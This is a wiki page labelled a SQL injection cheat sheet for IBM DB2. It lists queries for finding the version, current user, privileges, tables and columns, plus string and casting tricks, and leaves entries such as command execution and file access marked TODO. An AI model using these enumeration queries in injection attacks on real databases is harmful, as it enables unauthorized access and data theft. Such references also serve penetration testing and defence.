====== Hacking - SQL Injection Cheat Sheet (DB2) ======

|Version|select versionnumber, version_timestamp from sysibm.sysversions;|
|Comments|select blah from foo; -- comment like this|
|Current User|<code>
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
</code>|
|List Users|<code>
N/A (I think DB2 uses OS-level user accounts for authentication.)

Database authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;
</code>|
|List Password Hashes|N/A (I think DB2 uses OS-level user accounts for authentication.)|
|List Privileges|<code>
select * from syscat.tabauth; -- privs on tables
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
</code>|
|List DBA Accounts|TODO|
|Current Database|select current server from sysibm.sysdummy1;|
|List Databases|SELECT schemaname FROM syscat.schemata;|
|List Columns|select name, tbname, coltype from sysibm.syscolumns;|
|List Tables|select name from sysibm.systables;|
|Find Tables From Column Name|TODO|
|Select Nth Row|<code>
select name from (SELECT name FROM sysibm.systables order by 
name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
</code>|
|Select Nth Char|SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1;  -- returns b|
|Bitwise AND|[[http://www.tar.hu/sqlbible/sqlbible0084.html|This page]] seems to indicate that DB2 has no support for bitwise operators!|
|ASCII Value -> Char|select chr(65) from sysibm.sysdummy1; -- returns 'A'|
|Char -> ASCII Value|select ascii('A') from sysibm.sysdummy1; -- returns 65|
|Casting|<code>
SELECT cast('123' as integer) FROM sysibm.sysdummy1;|
SELECT cast(1 as char) FROM sysibm.sysdummy1;
</code>|
|String Concatenation|<code>
SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc'
select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab'
</code>|
|If Statement|TODO|
|Case Statement|TODO|
|Avoiding Quotes|TODO|
|Time Delay|???.  See [[https://www.microsoft.com/technet/community/columns/secmvp/sv0907.mspx|Heavy Queries]] article for some ideas.|
|Make DNS Requests|TODO|
|Command Execution|TODO|
|Local File Access|TODO|
|Hostname, IP Address|TODO|
|Location of DB files|TODO|
|Default/System Databases|TODO|


----

===== References =====

https://www.michaelboman.org/books/sql-injection-cheat-sheet-db2